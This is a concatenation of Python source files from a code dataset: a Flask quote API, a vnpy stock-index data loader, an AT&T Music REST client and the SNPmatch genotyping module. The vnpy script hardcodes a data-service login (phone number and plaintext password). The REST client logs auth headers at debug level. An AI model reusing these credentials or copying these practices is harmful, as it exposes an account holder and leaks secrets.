for idx, col in enumerate(cursor.description):
d[col[0]] = row[idx]
return d
def max_quote_id():
"""
:return: the last quote_id in the database
"""
db_connection.row_factory = dictionary_factory
sql = db_connection.cursor()
sql.execute('SELECT max(id) FROM quotes')
return sql.fetchone()["max(id)"]
def has_ip_verified(ip, quote_id):
"""
:param ip: the ip address of the request
:param quote_id: the quote_id requested
:type ip: str
:type quote_id: int
:return: bool
"""
sql = db_connection.cursor()
sql.execute('SELECT * FROM verifications WHERE sender_ip = ? AND quote_id = ?', (ip, quote_id))
if len(sql.fetchall()) > 0:
return True
else:
return False
def quote_id_exists(quote_id):
"""
:param quote_id: the quote_id requested
:type quote_id: int
:return: bool
"""
sql = db_connection.cursor()
sql.execute('SELECT * FROM quotes WHERE id=?', (quote_id,))
if len(sql.fetchall()) > 0:
return True
else:
return False
def log(level, message):
"""
:param level: the log-level
:param message: the message to log
:type level: str
:type message: str
:return: none
"""
if level == 'success':
color = 'green'
elif level == 'hard_error':
color = 'red'
elif level == 'soft_error':
color = 'magenta'
else:
color = 'white'
time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
print colored('[%s] %s' % (time, message), color)
if logging:
logfile_object = open(logfile, 'a')
logfile_object.write('[%s] %s \n' % (time, message))
logfile_object.close()
app = Flask(__name__)
@app.route('/quotapi/api/v1.0/quotes/<int:quote_id>', methods=['GET'])
def get_quote(quote_id):
if quote_id_exists(quote_id):
db_connection.row_factory = dictionary_factory
sql = db_connection.cursor()
sql.execute('SELECT quotes.*, SUM(verifications.verification) AS verification_sum FROM quotes INNER JOIN verifications ON quotes.id=verifications.quote_id WHERE quotes.id=?', (quote_id,))
quote = sql.fetchone()
log('success', '[GET] [200] [%s] - /quotapi/api/v1.0/quotes/%d' % (client_ip(), quote_id))
return jsonify({'quote': quote})
else:
log('soft_error', '[GET] [404] [%s] - /quotapi/api/v1.0/quotes/%d' % (client_ip(), quote_id))
abort(404)
@app.route('/quotapi/api/v1.0/quotes/verify/<int:quote_id>', methods=['POST'])
def post_verify_quote(quote_id):
verification = int(request.form['verification'])
sender_ip = client_ip()
log('success', '[POST] [200] [%s] - /quotapi/api/v1.0/quotes/%d' % (client_ip(), quote_id))
if quote_id_exists(quote_id):
if has_ip_verified(sender_ip, quote_id):
log('soft_error', '[VERIFICATION-FAILED-REPEATED-VERIFICATION] [409] [Ver.: %s] [%s] - /quotapi/api/v1.0/quotes/%d' % (
verification, client_ip(), quote_id))
abort(409)
else:
if -1 <= verification <= 1:
sql = db_connection.cursor()
sql.execute('INSERT INTO verifications (sender_ip, quote_id, verification) VALUES (?, ?, ?)', (
sender_ip, quote_id, verification))
db_connection.commit()
log('success', '[VERIFICATION] [%s] [%s] - /quotapi/api/v1.0/quotes/%d' % (
verification, client_ip(), quote_id))
return json.dumps({'success':True}), 200, {'ContentType':'application/json'}
else:
log('soft_error', '[VERIFICATION-FAILED] [Ver.: %s] [%s] - /quotapi/api/v1.0/quotes/%d' % (
verification, client_ip(), quote_id))
abort(403)
else:
log('soft_error', '[VERIFICATION-FAILED-UNKNOWN-QUOTE-ID] [404] [Ver.: %s] [%s] - /quotapi/api/v1.0/quotes/%d' % (
verification, client_ip(), quote_id))
abort(404)
@app.route('/quotapi/api/v1.0/quotes/random', methods=['GET'])
def get_random_quote():
last_quote_id = max_quote_id()
quote_id = random.randint(0, last_quote_id)
db_connection.row_factory = dictionary_factory
sql = db_connection.cursor()
sql.execute('SELECT quotes.*, SUM(verifications.verification) AS verification_sum FROM quotes INNER JOIN verifications ON quotes.id=verifications.quote_id WHERE quotes.id=?', (quote_id,))
quote = sql.fetchone()
log('success', '[GET] [200] [%s] - /quotapi/api/v1.0/quotes/random [%d]' % (client_ip(), quote_id))
return jsonify({'quote': quote})
@app.route('/quotapi/api/v1.0/quotes/search', methods=['POST'])
def post_search_quotes():
search_term = request.form['search_term']
db_connection.row_factory = dictionary_factory
sql = db_connection.cursor()
sql.execute('SELECT * FROM quotes WHERE quote LIKE ?', ("%" + search_term + "%",))
log('success', '[GET] [200] [%s] - /quotapi/api/v1.0/quotes/search [%s]' % (client_ip(), search_term))
return jsonify({'search_results': sql.fetchall()})
@app.route('/quotapi/api/v1.0/status', methods=['GET'])
def get_api_status():
log('success', '[GET] [200] [%s] - /quotapi/api/v1.0/status' % client_ip())
client_ip()
return json.dumps({'status': {'status': 'ok', 'number_of_quotes': max_quote_id()}}), 200, {'ContentType':'application/json'}
if __name__ == '__main__':
app.run(debug=True) | StarcoderdataPython |
5064430 | <filename>vnpy/analyze/data/data_prepare.py
from datetime import datetime, timedelta
from jqdatasdk import *
import vnpy.trader.constant as const
from vnpy.app.cta_strategy.base import (
INTERVAL_DELTA_MAP
)
from vnpy.trader.database import database_manager
from vnpy.trader.object import BarData, FinanceData
import pandas as pd
from typing import Sequence
def save_data_to_db(symbol, alias, count=5000):
"""数据入库"""
auth('13277099856', '1<PASSWORD>')
exchange = const.Exchange.get_exchange_by_alias(alias)
data = get_bars(symbol + '.' + alias, count, unit='1d',
fields=['date', 'open', 'high', 'low', 'close', 'volume'],
include_now=False, end_dt=None, fq_ref_date=None, df=True)
bars = []
for row in data.iterrows():
data = row[1]
bar = BarData(
gateway_name='test',
symbol=symbol,
exchange=exchange,
datetime=data.date,
interval=const.Interval.DAILY,
volume=data['volume'],
)
# open_interest: float = 0
bar.open_price = data['open']
bar.high_price = data['high']
bar.low_price = data['low']
bar.close_price = data['close']
bars.append(bar)
database_manager.save_bar_data(bars)
def load_bar_data(symbol, alias, start_date: datetime = None, end_data: datetime = None):
"""取出bar数据"""
exchange = const.Exchange.get_exchange_by_alias(alias)
interval = const.Interval.DAILY
progress_delta = timedelta(days=30)
total_delta = end_data - start_date
interval_delta = INTERVAL_DELTA_MAP[interval]
start = start_date
end = start_date + progress_delta
progress = 0
df = pd.DataFrame(columns=('date', 'open', 'high', 'low', 'close', 'volume'))
while start < end_data:
end = min(end, end_data) # Make sure end time stays within set range
datas = database_manager.load_bar_data(symbol, exchange, interval, start, end)
# data转为dataframe数据
for i, data in enumerate(datas):
df = df.append(
{'date': data.datetime, 'open': data.open_price, 'high': data.high_price, 'low': data.low_price,
'close': data.close_price,
'volume': data.volume}, ignore_index=True)
progress += progress_delta / total_delta
progress = min(progress, 1)
progress_bar = "#" * int(progress * 10)
print(f"加载进度:{progress_bar} [{progress:.0%}]")
start = end + interval_delta
end += (progress_delta + interval_delta)
print(f"历史数据加载完成,数据量:{df.__len__()}")
return df
# 指定日期的指数PE(市值加权)
def get_index_pe_date(index_code, date):
auth('13277099856', '1221gzcC')
stocks = get_index_stocks(index_code, date)
q = query(valuation).filter(valuation.code.in_(stocks))
df = get_fundamentals(q, date)
df = df[df['pe_ratio'] > 0]
if len(df) > 0:
# pe = len(df)/sum([1/p if p>0 else 0 for p in df.pe_ratio])
# pe = df['pe_ratio'].size/(1/df['pe_ratio']).sum()
pe = df['circulating_market_cap'].sum() / (df['circulating_market_cap'] / df['pe_ratio']).sum()
return pe
else:
return float('NaN')
# 指定日期的指数PB(市值加权)
def get_index_pb_date(index_code, date):
auth('13277099856', '1221gzcC')
stocks = get_index_stocks(index_code, date)
q = query(valuation).filter(valuation.code.in_(stocks))
df = get_fundamentals(q, date)
df = df[df['pb_ratio'] > 0]
if len(df) > 0:
# pb = len(df)/sum([1/p if p>0 else 0 for p in df.pb_ratio])
# pb = df['pb_ratio'].size/(1/df['pb_ratio']).sum()
pb = df['circulating_market_cap'].sum() / (df['circulating_market_cap'] / df['pb_ratio']).sum()
return pb
else:
return float('NaN')
def save_pe_pb(df, code):
"""保存PE、PB数据"""
finance_datas = []
for index, row in df.iterrows():
dt = datetime(row['date'].year, row['date'].month, row['date'].day)
pe = get_index_pe_date(code, dt)
pb = get_index_pb_date(code, dt)
finance_datas.append(FinanceData(code, dt, pe, pb, 'normal'))
database_manager.save_finance_data(finance_datas)
def load_finance_data(code, start_date: datetime = None, end_date: datetime = None):
datas = database_manager.load_finance_data(code, start_date, end_date)
df_finance = pd.DataFrame(columns=('code', 'datetime', 'pe', 'pb', 'pe_mid', 'pb_mid'))
for data in datas:
df_finance = df_finance.append(
{'code': data.code, 'datetime': data.datetime, 'pe': data.pe, 'pb': data.pb, 'pe_mid': data.pe_mid,
'pb_mid': data.pb_mid},
ignore_index=True)
return df_finance
def init_finance_data(symbol, alias):
df = load_bar_data(symbol, alias, start_date=datetime(2016, 1, 1), end_data=datetime(2020, 5, 1))
save_pe_pb(df, symbol + '.' + alias)
if __name__ == "__main__":
# 保存pe\pb数据
# df = load_bar_data('000300', 'XSHG', start_date=datetime(2020, 1, 1), end_data=datetime(2020, 5, 6))
# save_pe_pb(df, '000300.XSHG')
# df = load_bar_data('399001', 'XSHE', start_date=datetime(2014, 1, 1), end_data=datetime(2016, 1, 10))
# save_pe_pb(df, '399001.XSHE')
# print(const.Exchange.get_exchange_by_alias('XSHG'))
# save_data_to_db('000001', 'XSHG', 1)
# load_bar_data('000001', 'XSHG', start_date=datetime(2010, 1, 1), end_data=datetime(2010, 5, 1))
# save_data_to_db('159915', 'XSHE') # 创业板
# save_data_to_db('510300', 'XSHG', 50) # 沪深300
# save_data_to_db('510500', 'XSHG') # 中证500
# save_data_to_db('159901', 'XSHE') # 深证100
# save_data_to_db('510880', 'XSHG') # 红利ETF
# save_data_to_db('511010', 'XSHG') # 国债ETF
# save_data_to_db('518880', 'XSHG') # 黄金ETF
# save_data_to_db('159928', 'XSHE') # 消费ETF
# save_data_to_db('501018', 'XSHG') # 原油ETF
# save_data_to_db('513100', 'XSHG') # 纳斯达克ETF
# save_data_to_db('000300', 'XSHG') #
# 大盘bar data数据
# save_data_to_db('399001', 'XSHE')
# save_data_to_db('399006', 'XSHE')
# save_data_to_db('000300', 'XSHG', 100)
# save_data_to_db('399005', 'XSHE')
# save_data_to_db('000016', 'XSHG')
# save_data_to_db('000001', 'XSHG', 20)
# df = df.append({'vol': 123}, ignore_index=True)
# df = df.append({'vol': 123}, ignore_index=True)
# print(df.__len__())
# df = df.drop(0, axis=0)
# print(df.__len__())
# datas = load_bar_data('000001', 'XSHG', start_date=datetime(2010, 1, 1), end_data=datetime(2011, 4, 1))
# df = pd.DataFrame()
# emotion_p = 0
# for index, data in datas.iterrows():
# df = df.append({'vol': data.volume}, ignore_index=True)
# # 当前量 < 6天均值 ,连续6天
# if df.__len__() > 6:
# if data.volume/df.vol.mean() - 1 < 0:
# emotion_p = emotion_p + 1
# else:
# emotion_p = 0
# df = df.drop(0, axis=0)
# if emotion_p > 6:
# print(data.date.strftime("%Y-%m-%d") + '连续5天低于平均值')
# auth('13277099856', '1221gzcC')
# data = get_bars('000001.XSHG', 500, unit='60m',
# fields=['date', 'open', 'high', 'low', 'close', 'volume'],
# include_now=False, end_dt=None, fq_ref_date=None, df=True)
# print(data.head())
# 宽基
# save_data_to_db('000300', 'XSHG') # 沪深300
# save_data_to_db('399006', 'XSHE') # 创业板指
# save_data_to_db('000016', 'XSHG') # 上证50
# save_data_to_db('000905', 'XSHG') # 中证500
# 行业
# save_data_to_db('000913', 'XSHG') # 300医药 2007-07-02
# save_data_to_db('000932', 'XSHG') # 中证消费 2009-07-03
# save_data_to_db('399437', 'XSHE') # 国证证券行业指数 2014-12-30
# save_data_to_db('399967', 'XSHE') # 中证军工 2013-12-26
# save_data_to_db('399986', 'XSHE') # 中证银行指数 2014-12-30
# save_data_to_db('000015', 'XSHG') # 红利指数 2005-01-04
# save_data_to_db('000018', 'XSHG') # 180金融 2007-12-10
# save_data_to_db('000012', 'XSHG') # 国债指数 2003-01-02
# save_data_to_db('513100', 'XSHG') # TMT50
save_data_to_db('000001', 'XSHG')
| StarcoderdataPython |
12823737 | <gh_stars>0
#
# -------------------------------------------------------------------------
# Copyright (c) 2019 AT&T Intellectual Property
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -------------------------------------------------------------------------
#
import base64
import json
import requests
from valet.utils.decryption import decrypt
class REST(object):
"""Helper class for REST operations."""
def __init__(self, hosts, port, path, timeout, retries,
userid, password, ns, logger):
"""Initializer. Accepts target host list, port, and path."""
self.hosts = hosts # List of IP or FQDNs
self.port = port # Port Number
self.path = path # Path starting with /
self.timeout = float(timeout) # REST request timeout in seconds
self.retries = retries # Retires before failing over to next Music server.
self.userid = userid
self.password = password
self.ns = ns
self.logger = logger # For logging
self.urls = []
for host in self.hosts:
# Must end without a slash
self.urls.append('http://%(host)s:%(port)s%(path)s' % {
'host': host,
'port': self.port,
'path': self.path,
})
def __headers(self, content_type='application/json'):
"""Returns HTTP request headers."""
headers = {
'ns': self.ns,
'accept': content_type,
'content-type': content_type,
'authorization': 'Basic %s' % base64.b64encode((self.userid + ':' + self.password).encode()).decode()
}
return headers
def request(self, method='get', content_type='application/json', path='/',
data=None, raise400=True):
""" Performs HTTP request """
if method not in ('post', 'get', 'put', 'delete'):
raise KeyError("Method must be: post, get, put, or delete.")
method_fn = getattr(requests, method)
if data:
data_json = json.dumps(data)
else:
data_json = None
response = None
timeout = False
err_message = ""
full_url = ""
for url in self.urls:
# Try each url in turn. First one to succeed wins.
full_url = url + path
for attempt in range(self.retries):
# Ignore the previous exception.
try:
my_headers = self.__headers(content_type)
for header_key in my_headers:
if (type(my_headers[header_key]).__name__ == 'unicode'):
my_headers[header_key] = my_headers[header_key].encode('ascii', 'ignore')
response = method_fn(full_url, data=data_json,
headers=my_headers,
timeout=self.timeout)
if raise400 or not response.status_code == 400:
response.raise_for_status()
return response
except requests.exceptions.Timeout as err:
err_message = str(err) #err.message
response = requests.Response()
response.url = full_url
if not timeout:
self.logger.warning("Music: %s Timeout" % url, errorCode='availability')
timeout = True
except requests.exceptions.RequestException as err:
err_message = str(err) #err.message
self.logger.debug("Music: %s Request Exception" % url)
self.logger.debug(" method = %s" % method)
self.logger.debug(" timeout = %s" % self.timeout)
self.logger.debug(" err = %s" % err)
self.logger.debug(" full url = %s" % full_url)
self.logger.debug(" request data = %s" % data_json)
self.logger.debug(" request headers = %s" % my_headers)
self.logger.debug(" status code = %s" % response.status_code)
self.logger.debug(" response = %s" % response.text)
self.logger.debug(" response headers = %s" % response.headers)
# If we get here, an exception was raised for every url,
# but we passed so we could try each endpoint. Raise status
# for the last attempt (for now) so that we report something.
if response is not None:
self.logger.debug("Music: Full Url: %s", full_url)
self.logger.debug("Music: %s ", err_message)
response.raise_for_status()
class Music(object):
"""Wrapper for Music API"""
def __init__(self, _config, _logger):
"""Initializer. Accepts a lock_timeout for atomic operations."""
self.logger = _logger
pw = decrypt(_config["engine"]["ek"],
_config["logging"]["lk"],
_config["db"]["dk"],
_config["music"]["password"])
kwargs = {
'hosts': _config["music"]["hosts"],
'port': _config["music"]["port"],
'path': _config["music"]["path"],
'timeout': _config["music"]["timeout"],
'retries': _config["music"]["retries"],
'userid': _config["music"]["userid"],
'password': pw,
'ns': _config["music"]["namespace"],
'logger': _logger,
}
self.rest = REST(**kwargs)
self.lock_names = []
self.lock_timeout = _config["music"]["lock_timeout"]
self.replication_factor = _config["music"]["replication_factor"]
@staticmethod
def __row_url_path(keyspace, table, pk_name=None, pk_value=None):
"""Returns a Music-compliant row URL path."""
path = '/keyspaces/%(keyspace)s/tables/%(table)s/rows' % {
'keyspace': keyspace,
'table': table,
}
if pk_name and pk_value:
path += '?%s=%s' % (pk_name, pk_value)
return path
def create_keyspace(self, keyspace):
"""Creates a keyspace."""
data = {
'replicationInfo': {
# 'class': 'NetworkTopologyStrategy',
# 'dc1': self.replication_factor,
'class': 'SimpleStrategy',
'replication_factor': self.replication_factor,
},
'durabilityOfWrites': True,
'consistencyInfo': {
'type': 'eventual',
},
}
path = '/keyspaces/%s' % keyspace
response = self.rest.request(method='post', path=path, data=data)
return response.ok
def drop_keyspace(self, keyspace):
"""Drops a keyspace."""
data = {
'consistencyInfo': {
'type': 'eventual',
},
}
path = '/keyspaces/%s' % keyspace
response = self.rest.request(method='delete', path=path, data=data)
return response.ok
def create_table(self, keyspace, table, schema):
"""Creates a table."""
data = {
'fields': schema,
'consistencyInfo': {
'type': 'eventual',
},
}
self.logger.debug(data)
path = '/keyspaces/%(keyspace)s/tables/%(table)s' % {
'keyspace': keyspace,
'table': table,
}
response = self.rest.request(method='post', path=path, data=data)
return response.ok
def create_index(self, keyspace, table, index_field, index_name=None):
"""Creates an index for the referenced table."""
data = None
if index_name:
data = {
'index_name': index_name,
}
pstr = '/keyspaces/%(keyspace)s/tables/%(table)s/index/%(index_field)s'
path = pstr % {
'keyspace': keyspace,
'table': table,
'index_field': index_field,
}
response = self.rest.request(method='post', path=path, data=data)
return response.ok
def version(self):
"""Returns version string."""
path = '/version'
response = self.rest.request(method='get', content_type='text/plain', path=path)
return response.text
def create_lock(self, lock_name):
"""Returns the lock id. Use for acquiring and releasing."""
path = '/locks/create/%s' % lock_name
response = self.rest.request(method='post', path=path)
return json.loads(response.text)["lock"]["lock"]
def acquire_lock(self, lock_id):
"""Acquire a lock."""
path = '/locks/acquire/%s' % lock_id
response = self.rest.request(method='get', path=path, raise400=False)
return json.loads(response.text)["status"] == "SUCCESS"
def release_lock(self, lock_id):
"""Release a lock."""
path = '/locks/release/%s' % lock_id
response = self.rest.request(method='delete', path=path)
return response.ok
def delete_lock(self, lock_name):
"""Deletes a lock by name."""
path = '/locks/delete/%s' % lock_name
response = self.rest.request(method='delete', path=path, raise400=False)
return response.ok
def delete_all_locks(self):
"""Delete all locks created during the lifetime of this object."""
# TODO(JD): Shouldn't this really be part of internal cleanup?
# FIXME: It can be several API calls. Any way to do in one fell swoop?
for lock_name in self.lock_names:
self.delete_lock(lock_name)
def create_row(self, keyspace, table, values):
"""Create a row."""
# self.logger.debug("MUSIC: create_row "+ table)
data = {
'values': values,
'consistencyInfo': {
'type': 'eventual',
},
}
path = '/keyspaces/%(keyspace)s/tables/%(table)s/rows' % {
'keyspace': keyspace,
'table': table,
}
response = self.rest.request(method='post', path=path, data=data)
return response.ok
def insert_atom(self, keyspace, table, values, name=None, value=None):
"""Atomic create/update row."""
data = {
'values': values,
'consistencyInfo': {
'type': 'atomic',
}
}
path = self.__row_url_path(keyspace, table, name, value)
method = 'post'
# self.logger.debug("MUSIC: Method: %s ", (method.upper()))
# self.logger.debug("MUSIC: Path: %s", (path))
# self.logger.debug("MUSIC: Data: %s", (data))
self.rest.request(method=method, path=path, data=data)
def update_row_eventually(self, keyspace, table, values):
"""Update a row. Not atomic."""
data = {
'values': values,
'consistencyInfo': {
'type': 'eventual',
},
}
path = self.__row_url_path(keyspace, table)
response = self.rest.request(method='post', path=path, data=data)
return response.ok
def delete_row_eventually(self, keyspace, table, pk_name, pk_value):
"""Delete a row. Not atomic."""
data = {
'consistencyInfo': {
'type': 'eventual',
},
}
path = self.__row_url_path(keyspace, table, pk_name, pk_value)
response = self.rest.request(method='delete', path=path, data=data)
return response.ok
def delete_atom(self, keyspace, table, pk_name, pk_value):
"""Atomic delete row."""
data = {
'consistencyInfo': {
'type': 'atomic',
}
}
path = self.__row_url_path(keyspace, table, pk_name, pk_value)
self.rest.request(method='delete', path=path, data=data)
def read_row(self, keyspace, table, pk_name, pk_value):
"""Read one row based on a primary key name/value."""
path = self.__row_url_path(keyspace, table, pk_name, pk_value)
response = self.rest.request(path=path)
return response.json()
def read_all_rows(self, keyspace, table):
"""Read all rows."""
return self.read_row(keyspace, table, pk_name=None, pk_value=None)
| StarcoderdataPython |
1639395 | <gh_stars>1-10
"""
SNPmatch
"""
import numpy as np
import pandas as pd
import scipy as sp
from scipy import stats
import numpy.ma
import logging
import sys
import os
from . import parsers
from . import snp_genotype
import json
log = logging.getLogger(__name__)
lr_thres = 3.841
snp_thres = 4000
prob_thres = 0.98
def die(msg):
sys.stderr.write('Error: ' + msg + '\n')
sys.exit(1)
def get_fraction(x, y, y_min = 0):
if y <= y_min:
return(np.nan)
return(float(x)/y)
np_get_fraction = np.vectorize(get_fraction, excluded = "y_min")
def likeliTest(n, y):
## n == total informative sites
## y == number of matched sites
assert y <= n, "provided y is greater than n"
p = 0.99999999
if n == 0:
return(np.nan)
pS = float(y)/n
if y == n:
return(1)
if y > 0:
a = y * np.log(pS/p)
b = (n - y) * np.log((1-pS)/(1-p))
return(a+b)
elif y == 0:
return(np.nan)
def test_identity(x, n, error_rate = 0.0005, pthres = 0.05, n_thres = 20):
if n <= n_thres:
return(np.nan)
st = stats.binom_test(int(n - x), n, p = float(error_rate), alternative='greater')
if st <= pthres:
return(float(0))
else:
return(float(1))
np_test_identity = np.vectorize(test_identity, excluded=["pthres", "error_rate", "n_thres"])
def matchGTsAccs(sampleWei, t1001snps, skip_hets_db = False):
assert sampleWei.shape[0] == t1001snps.shape[0], "please provide same number of positions for both sample and db"
assert sampleWei.shape[1] == 3, "SNP weights should be a np.array with shape == n,3"
## Initilizing
if skip_hets_db:
t1001snps[t1001snps == 2] = -1
num_lines = t1001snps.shape[1]
TarGTs0 = np.zeros(t1001snps.shape, dtype="int8") ## Homo -- ref
TarGTs1 = np.ones(t1001snps.shape, dtype="int8") + 1 ## Hets
TarGTs2 = np.ones(t1001snps.shape, dtype="int8") ## Homo -- alt
score = np.zeros( num_lines )
score = score + np.multiply(np.array(numpy.ma.masked_less(t1001snps, 0) == TarGTs0, dtype=int).T, sampleWei[:,0]).sum(axis = 1)
score = score + np.multiply(np.array(numpy.ma.masked_less(t1001snps, 0) == TarGTs1, dtype=int).T, sampleWei[:,1]).sum(axis = 1)
score = score + np.multiply(np.array(numpy.ma.masked_less(t1001snps, 0) == TarGTs2, dtype=int).T, sampleWei[:,2]).sum(axis = 1)
ninfo = np.repeat(t1001snps.shape[0], num_lines) - np.sum(numpy.ma.masked_less(t1001snps, 0).mask.astype(int ), axis = 0)
return((score, ninfo))
class GenotyperOutput(object):
## class object for main SNPmatch output
def __init__(self, AccList, ScoreList, NumInfoSites, overlap, NumMatSNPs, DPmean ):
self.accs = np.array(AccList, dtype="str")
self.scores = np.array(ScoreList, dtype="int")
self.ninfo = np.array(NumInfoSites, dtype="int")
self.overlap = overlap
self.num_snps = NumMatSNPs
self.dp = DPmean
def get_probabilities(self):
probs = [get_fraction(self.scores[i], self.ninfo[i]) for i in range(len(self.accs))]
self.probabilies = np.array(probs, dtype="float")
@staticmethod
def calculate_likelihoods(scores, ninfo, amin = "calc"):
num_lines = len(scores)
nplikeliTest = np.vectorize(likeliTest,otypes=[float])
LikeLiHoods = nplikeliTest(ninfo, scores)
if amin == "calc":
TopHit = np.nanmin(LikeLiHoods)
else:
TopHit = float(amin)
LikeLiHoodRatios = [get_fraction(LikeLiHoods[i], TopHit) for i in range(num_lines)]
LikeLiHoodRatios = np.array(LikeLiHoodRatios, dtype="float")
return((LikeLiHoods, LikeLiHoodRatios))
def get_likelihoods(self, amin = "calc"):
(self.likelis, self.lrts) = self.calculate_likelihoods(self.scores, self.ninfo, amin)
def print_out_table(self, outFile):
self.get_likelihoods()
self.get_probabilities()
output_table = pd.DataFrame( {
'accs': self.accs,
'matches': self.scores,
'ninfo': self.ninfo,
'probabilities': self.probabilies,
'likelihood': self.likelis,
'lrt': self.lrts,
'num_snps': self.num_snps,
'dp': np.nanmean(self.dp)
} )
output_table = output_table[ ['accs', 'matches', 'ninfo', 'probabilities', 'likelihood', 'lrt', 'num_snps', 'dp'] ]
if outFile:
output_table.to_csv( outFile, header = None, sep = "\t", index = None )
return( output_table )
def print_json_output(self, outFile):
self.get_likelihoods()
self.get_probabilities()
topHits = np.where(self.lrts < lr_thres)[0]
overlapScore = [get_fraction(self.ninfo[i], self.num_snps) for i in range(len(self.accs))]
sorted_order = topHits[np.argsort(-self.probabilies[topHits])]
(case, note) = self.case_interpreter(topHits)
matches_dict = [(str(self.accs[i]), float(self.probabilies[i]), int(self.ninfo[i]), float(overlapScore[i])) for i in sorted_order]
topHitsDict = {'overlap': [self.overlap, self.num_snps], 'matches': matches_dict, 'interpretation':{'case': case, 'text': note}}
with open(outFile, "w") as out_stats:
out_stats.write(json.dumps(topHitsDict, sort_keys=True, indent=4))
def case_interpreter(self, topHits):
overlap_thres = 0.5
case = 1
note = "Ambiguous sample"
if len(topHits) == 1:
case = 0
note = "Unique hit"
elif np.nanmean(self.probabilies[topHits]) > prob_thres:
case = 2
note = "Ambiguous sample: Accessions in top hits can be really close"
elif self.overlap > overlap_thres:
case = 3
note = "Ambiguous sample: Sample might contain mixture of DNA or contamination"
elif self.overlap < overlap_thres:
case = 4
note = "Ambiguous sample: Many input SNP positions are missing in db positions. Maybe sample not one in database"
return(case, note)
class Genotyper(object):
## class object for main SNPmatch
def __init__(self, inputs, g, outFile, run_genotyper = True, skip_db_hets = False, chunk_size = 1000):
assert type(g) is snp_genotype.Genotype, "provide a snp_genotype.Genotype class for genotypes"
inputs.filter_chr_names()
self.chunk_size = chunk_size
self.inputs = inputs
self.g = g
self.num_lines = len(self.g.g.accessions)
self.outFile = outFile
self._skip_db_hets = skip_db_hets
if run_genotyper:
self.result = self.genotyper()
self.write_genotyper_output( self.result )
def get_common_positions(self):
self.commonSNPs = self.g.get_positions_idxs( self.inputs.chrs, self.inputs.pos )
def filter_tophits(self):
self.result = self.genotyper()
self.write_genotyper_output( self.result )
self.result.get_likelihoods()
topHits = np.where(self.result.lrts < lr_thres)[0]
if len(topHits) == 1:
log.info("Done! It is a perfect hit")
return(None)
log.info("#lines indistinguishable: %s" % len(topHits))
log.info("refining likelihoods for only indistinguishable lines")
if len(topHits) > (self.num_lines / 2):
log.info("too many lines are indistinguishable, skipping refining likelihoods step")
return(None)
seg_ix = self.g.identify_segregating_snps( topHits )
self.result_fine = self.genotyper( filter_pos_ix = seg_ix, mask_acc_ix = np.where(self.result.lrts >= lr_thres)[0] )
log.info("writing output: %s" % self.outFile + ".refined.scores.txt")
self.result_fine.print_out_table( self.outFile + ".refined.scores.txt" )
def genotyper(self, filter_pos_ix = None, mask_acc_ix = None):
ScoreList = np.zeros(self.num_lines, dtype="float")
NumInfoSites = np.zeros(len(self.g.g.accessions), dtype="uint32")
self.get_common_positions()
if filter_pos_ix is not None:
assert type(filter_pos_ix) is np.ndarray, "provide np array for indices to be considered"
t_ix = np.where(np.in1d(self.commonSNPs[0], filter_pos_ix))[0]
if t_ix.shape[0] < 100:
log.info("#positions in segregating sites are are too little: %s" % t_ix.shape[0])
self.commonSNPs = (self.commonSNPs[0][t_ix], self.commonSNPs[1][t_ix] )
NumMatSNPs = len(self.commonSNPs[0])
for j in range(0, NumMatSNPs, self.chunk_size):
matchedAccInd = self.commonSNPs[0][j:j+self.chunk_size]
matchedTarInd = self.commonSNPs[1][j:j+self.chunk_size]
matchedTarWei = self.inputs.wei[matchedTarInd,]
t1001SNPs = self.g.g.snps[matchedAccInd,:]
t_s, t_n = matchGTsAccs( matchedTarWei, t1001SNPs, self._skip_db_hets )
ScoreList = ScoreList + t_s
NumInfoSites = NumInfoSites + t_n
if j % (self.chunk_size * 50) == 0:
log.info("Done analysing %s positions", j+self.chunk_size)
overlap = get_fraction(NumMatSNPs, len(self.inputs.pos))
if mask_acc_ix is not None:
assert type(mask_acc_ix) is np.ndarray, "provide a numpy array of accessions indices to mask"
mask_acc_to_print = np.setdiff1d(np.arange( self.num_lines ), mask_acc_ix)
return( GenotyperOutput(self.g.g.accessions[mask_acc_to_print], ScoreList[mask_acc_to_print], NumInfoSites[mask_acc_to_print], overlap, NumMatSNPs, self.inputs.dp) )
return( GenotyperOutput(self.g.g.accessions, ScoreList, NumInfoSites, overlap, NumMatSNPs, self.inputs.dp) )
def write_genotyper_output(self, result):
log.info("writing score file!")
result.get_likelihoods()
result.print_out_table( self.outFile + '.scores.txt' )
result.print_json_output( self.outFile + ".matches.json" )
getHeterozygosity(self.inputs.gt[self.commonSNPs[1]], self.outFile + ".matches.json")
return(result)
def getHeterozygosity(snpGT, outFile='default'):
snpBinary = parsers.parseGT(snpGT)
numHets = len(np.where(snpBinary == 2)[0])
if outFile != 'default':
with open(outFile) as json_out:
topHitsDict = json.load(json_out)
topHitsDict['percent_heterozygosity'] = get_fraction(numHets, len(snpGT))
with open(outFile, "w") as out_stats:
out_stats.write(json.dumps(topHitsDict, sort_keys=True, indent=4))
return(get_fraction(numHets, len(snpGT)))
def potatoGenotyper(args):
inputs = parsers.ParseInputs(inFile = args['inFile'], logDebug = args['logDebug'])
log.info("loading database files")
g = snp_genotype.Genotype(args['hdf5File'], args['hdf5accFile'])
log.info("done!")
log.info("running genotyper!")
if args['refine']:
genotyper = Genotyper(inputs, g, args['outFile'], run_genotyper=False, skip_db_hets = args['skip_db_hets'])
genotyper.filter_tophits()
log.info("finished!")
return(None)
genotyper = Genotyper(inputs, g, args['outFile'], run_genotyper=True, skip_db_hets = args['skip_db_hets'])
log.info("finished!")
def pairwiseScore(inFile_1, inFile_2, logDebug, outFile = None, hdf5File = None):
snpmatch_stats = {}
log.info("loading input files")
inputs_1 = parsers.ParseInputs(inFile = inFile_1, logDebug = logDebug)
inputs_2 = parsers.ParseInputs(inFile = inFile_2, logDebug = logDebug)
if hdf5File is not None:
log.info("loading database file to identify common SNP positions")
g = snp_genotype.Genotype(hdf5File, None)
snpmatch_stats['hdf5'] = hdf5File
commonSNPs_1 = g.get_positions_idxs( inputs_1.chrs, inputs_1.pos )
common_inds = snp_genotype.Genotype.get_common_positions( inputs_1.chrs[commonSNPs_1[1]], inputs_1.pos[commonSNPs_1[1]], inputs_2.chrs, inputs_2.pos )
